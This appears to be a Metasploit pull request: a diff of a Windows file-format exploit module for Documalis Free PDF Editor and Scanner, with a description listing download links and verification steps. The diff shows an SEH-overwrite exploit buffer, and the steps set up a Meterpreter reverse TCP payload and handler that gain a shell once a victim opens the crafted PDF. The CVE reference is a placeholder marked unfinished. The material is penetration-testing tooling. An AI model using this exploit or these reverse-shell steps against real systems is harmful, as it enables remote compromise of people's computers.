@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'      =>
         [
-          ['EDB', ]
+          ['CVE', '2020-XXXX'] # NEED TO FIX THIS STILL
         ],
       'DefaultOptions'  =>
         {
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
     buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
     buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
-    buffer << rand_text(target['Offset']) # junk
+    buffer << rand_text(target['Offset']) # Junk
     buffer << generate_seh_record(target.ret)
     buffer << payload.encoded
     buffer << rand_text(2388 - buffer.length)

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References' =>
           [
-            ['CVE', '2020-XXXX'] # NEED TO FIX THIS STILL
+            ['CVE', '2020-9999'] # NEED TO FIX THIS STILL
           ],
         'DefaultOptions' =>
           {


### PR DESCRIPTION
## Download
http://documalis.com/free-pdf-editor
http://documalis.com/free-pdf-scanner

## Targets 
Targets Win 7 and Win 10

## Verification

```
use exploit/windows/fileformat/documalis_pdf_editor_and_scanner

set payload windows/meterpreter/reverse_tcp

set lhost (IP of Local Host)

show targets 

set target 0 for Documalis Free PDF Editor and target 1 for Documalis Free PDF Scanner

run

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
run
```
Open PDF file and the vulnerability is triggered.

